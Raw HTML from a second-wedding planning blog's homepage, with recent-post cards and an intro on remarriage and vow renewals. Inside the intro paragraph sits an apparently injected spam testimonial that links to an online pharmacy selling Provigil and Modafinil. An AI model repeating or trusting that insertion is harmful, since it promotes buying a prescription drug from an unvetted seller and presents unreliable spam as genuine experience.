datetime="2019-02-15T11:08:46-04:00">February 15, 2019</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2019-02-15T11:08:46-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:01:41-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?fit=700%2C1050&#038;ssl=1'/> <meta itemprop='width' content='700'/> <meta itemprop='height' content='1050'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="card-idea etiquette-planning inspiration wedding-planning-2"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9918 post type-post status-publish format-standard has-post-thumbnail hentry category-card-idea category-etiquette-planning category-inspiration category-wedding-planning-2" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="thank you card examples" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" itemprop="url" rel="bookmark"> 10 Wedding Thank-You Card Examples You&#8217;ll Love </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" class="vw-post-date updated" title="Permalink to 10 Wedding Thank-You Card Examples You&#8217;ll Love" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-23T11:04:17-04:00">January 23, 2019</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-23T11:04:17-04:00"/><meta itemprop="dateModified" content="2019-05-07T17:49:21-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?fit=1200%2C857&#038;ssl=1'/> <meta itemprop='width' content='1200'/> <meta itemprop='height' content='857'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="decoration inspiration wedding-decor wedding-makeup"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9892 post type-post status-publish format-standard has-post-thumbnail hentry category-decoration category-inspiration category-wedding-decor category-wedding-makeup tag-1403 tag-inspiration-2 tag-trends tag-wedding" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends" itemprop="url" rel="bookmark"> Everything You Need to Know About 2019 Wedding Trends </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends" class="vw-post-date updated" title="Permalink to Everything You Need to Know About 2019 Wedding Trends" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-14T10:14:03-04:00">January 14, 2019</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-14T10:14:03-04:00"/><meta itemprop="dateModified" content="2019-01-14T10:14:45-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?fit=1116%2C1500&#038;ssl=1'/> <meta itemprop='width' content='1116'/> <meta itemprop='height' content='1500'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="inspiration wedding-advice wedding-planning-2"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9869 post type-post status-publish format-standard has-post-thumbnail hentry category-inspiration category-wedding-advice category-wedding-planning-2" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="standout wedding day ideas" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=225%2C125&amp;ssl=1 225w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/" itemprop="url" rel="bookmark"> 21 Ways You Can Make Your Wedding a Stand-Out Affair </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/" class="vw-post-date updated" title="Permalink to 21 Ways You Can Make Your Wedding a Stand-Out Affair" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-08T12:32:51-04:00">January 8, 2019</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-08T12:32:51-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:36:25-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?fit=600%2C399&#038;ssl=1'/> <meta itemprop='width' content='600'/> <meta itemprop='height' content='399'/> </div> </div> </div> </div> </div></div></div> </li> <li id="menu-item-6025" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6025 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.oncewed.com/used-wedding-dresses/" class=" menu-link main-menu-link"><span>Used Wedding Dresses</span></a></li> </ul> </nav> <!-- End Main Menu --> </div> </div> </header> <!-- End Site Header --> </div> <div class="vw-content-area clearfix"> <section class="vwspc-section vwspc-section-custom-section " id="vwspc-section-1"> <div class="container"> <div class="row"> <div class="col-lg-12 vwspc-section-content"> <h2>Second Wedding Ideas for Your Remarriage.</h2> <h3>Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals.</h3> <p>There are a lot of things that are actually kind of fantastic the second time around, not the least of which are second weddings and vow renewal ceremonies. So, now that you’ve found the proverbial needle in the haystack for a second time, or have decided to recommit yourself to the one you love&#8230; what to do? Celebrate, that’s what! You&#8217;ve done all the hard work of finding your perfect match, the least we can do is provide information and resources that will make your second marriage or vow renewal a bit easier!</p> <p>From tips and articles on finding the <a title="Second Wedding Dress" href="http://www.idotaketwo.com/blog/second-wedding-dress/"><strong>perfect wedding dress for your second wedding</strong></a> or vow renewal, staying calm during the planning process, understanding <a title="Wedding Etiquette Advice" href="http://www.idotaketwo.com/blog/wedding-etiquette-advice/"><strong>second wedding etiquette</strong></a> and answering questions you never thought to ask. Our section on <strong>children and second marriages</strong> is very popular amongst those who are bringing children to their new marriage, trust us there is a lot to think about. The last thing you want to do is get bogged down in the tedium of questions like: <strong><a href="http://www.idotaketwo.com/wedding_attire_for_children.html">What will the kids wear?</a> <a href="http://www.idotaketwo.com/child_wedding.html">How can we get them involved?</a> </strong></p> <div id="how-should-f68o"><p>I took <a style="text-decoration: underline; color: #0000EE;" href="https://providrug.com/">Provigil</a> three times and I liked the inrush of energy and the increased concentration that this drug stimulates. But the next day after buying Modafinil at <a style="text-decoration: underline; color: #0000EE;" href="https://providrug.com/modafinil/">https://providrug.com/modafinil/</a> I had a headache which lasted almost all day.</p><p id="how-should-f68">How should we <a href="http://www.idotaketwo.com/wedding_invitations.html">phrase the invitations?</a> What do we need to do with <a href="http://www.idotaketwo.com/christian_remarriage.html">the Church?</a> And how do I bring up the &#8220;p&#8221; word when I&#8217;ve just promised to marry the person I love? From<a href="http://www.idotaketwo.com/blog/category/etiquette-planning/">etiquette</a> to <a href="http://www.idotaketwo.com/prenuptial_agreement.html">to prenups</a> &#8211; we cover all the topics you&#8217;ll need to consider, but shouldn&#8217;t have to stress about. Finally, our religion and second marriage and finance and legal sections round out what we believe is the most robust set of guides for couples renewing vows or getting remarried.</p></div> <p>Whether you are a divorcee who&#8217;s getting it right with <span id="number-786">number <a href="https://www.idotaketwo.com/blog/category/inspiration/page/2/">two</a></span>, a widower who&#8217;s taking a leap of faith on a second lease on love, a couple who is remarrying each other or a pair of love doves who wants to renew their vows, Idotaketwo.com is your comprehensive resource to second wedding help and guide to remarriage.</p><div class='code-block code-block-5 ai-viewport-3' style='margin: 8px 0; clear: both;'> <!-- /39950040/IDoTakeTwo/IDoTakeTwo_Mobile/IDoTakeTwo_Mobile_300x250 --> <!-- <div id='div-gpt-ad-1501765835034-0'> </div> testmobile --> </div> </div> </div> </div> </section><section class="vwspc-section vwspc-section-post-box-sidebar vwspc-post-box-layout-block-a-2" id="vwspc-section-2"> <div class="container"> <div class="row"> <div class="col-lg-8 vwspc-section-content"> <header class="vwspc-section-header"> <h3 class="vwspc-section-title"> <span class="">Recent Posts</span> </h3> </header> <div class="vw-loop vw-loop--block-a vw-loop--block-a-2 vw-loop--border-bottom"> <div class="vw-flex-grid vw-flex-grid--sm-2 vw-flex-grid--large-gap vw-flex-grid---no-grow vw-isotope"> <div class="vw-flex-grid__item" data-slugs="wedding-jewelry"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9989 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-jewelry" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/2019-engagement.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/2019-engagement.jpg?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/2019-engagement.jpg?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/2019-engagement.jpg?resize=225%2C125&amp;ssl=1 225w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/2019-engagement.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/2019-engagement.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/engagement-ring-styles-in-2019/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1289" href="https://www.idotaketwo.com/blog/category/wedding-jewelry/" title="View all posts in Wedding Jewelry" rel="category">Wedding Jewelry</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/engagement-ring-styles-in-2019/" itemprop="url" rel="bookmark"> Engagement Ring Styles in 2019 </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/engagement-ring-styles-in-2019/" class="vw-post-date updated" title="Permalink to Engagement Ring Styles in 2019" rel="bookmark"><time itemprop="datePublished" datetime="2019-03-27T23:07:27-04:00">March 27, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>Your engagement ring is something you’ll treasure for a lifetime. It’s a symbol of the eternal bond between you and your partner— and, of course, it’s also a beautiful piece of jewelry you can enjoy wearing every day. But how do you know which engagement ring style is right for you? Engagement rings come in &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/engagement-ring-styles-in-2019/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/engagement-ring-styles-in-2019/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-03-27T23:07:27-04:00"/><meta itemprop="dateModified" content="2019-03-27T23:08:17-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/2019-engagement.jpg?fit=1188%2C1188&#038;ssl=1'/> <meta itemprop='width' content='1188'/> <meta itemprop='height' content='1188'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="questions-answered"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9986 post type-post status-publish format-standard has-post-thumbnail hentry category-questions-answered" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/tips-for-moving-in-together-after-the-wedding/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-210" href="https://www.idotaketwo.com/blog/category/questions-answered/" title="View all posts in Questions Answered" rel="category">Questions Answered</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/tips-for-moving-in-together-after-the-wedding/" itemprop="url" rel="bookmark"> Tips For Moving In Together After The Wedding </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/tips-for-moving-in-together-after-the-wedding/" class="vw-post-date updated" title="Permalink to Tips For Moving In Together After The Wedding" rel="bookmark"><time itemprop="datePublished" datetime="2019-03-27T22:52:19-04:00">March 27, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>For many happily married couples, the thought of moving in together only culminates after the ceremony and honeymoon. After all, you&#8217;ll want to be sure that you&#8217;re serious about each other before making the step toward living together. While it&#8217;s true that a lot of modern couples would have already moved in together well before &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/tips-for-moving-in-together-after-the-wedding/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/tips-for-moving-in-together-after-the-wedding/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-03-27T22:52:19-04:00"/><meta itemprop="dateModified" content="2019-03-27T22:52:19-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?fit=1920%2C1280&#038;ssl=1'/> <meta itemprop='width' content='1920'/> <meta itemprop='height' content='1280'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="destination-wedding wedding-planning-2"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9954 post type-post status-publish format-standard has-post-thumbnail hentry category-destination-wedding category-wedding-planning-2 tag-destinaton tag-elopement tag-travel" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/top-7-locations-for-a-wedding-abroad/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1377" href="https://www.idotaketwo.com/blog/category/destination-wedding/" title="View all posts in Destination Wedding" rel="category">Destination Wedding</a><a class=" vw-cat-id-1377 vw-cat-id-163" href="https://www.idotaketwo.com/blog/category/wedding-planning-2/" title="View all posts in Wedding Planning" rel="category">Wedding Planning</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/top-7-locations-for-a-wedding-abroad/" itemprop="url" rel="bookmark"> Top 7 Locations for a Wedding Abroad </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/top-7-locations-for-a-wedding-abroad/" class="vw-post-date updated" title="Permalink to Top 7 Locations for a Wedding Abroad" rel="bookmark"><time itemprop="datePublished" datetime="2019-02-23T22:28:15-04:00">February 23, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>Everyone has different perspectives on what a wedding should be: some believe in the beauty of tradition, while others might prefer to do something bold, modern or a little bit out there. Whatever your view, one of the best things about planning your second wedding is that you have an opportunity to be a little &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/top-7-locations-for-a-wedding-abroad/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/top-7-locations-for-a-wedding-abroad/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-02-23T22:28:15-04:00"/><meta itemprop="dateModified" content="2019-02-23T22:28:15-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" 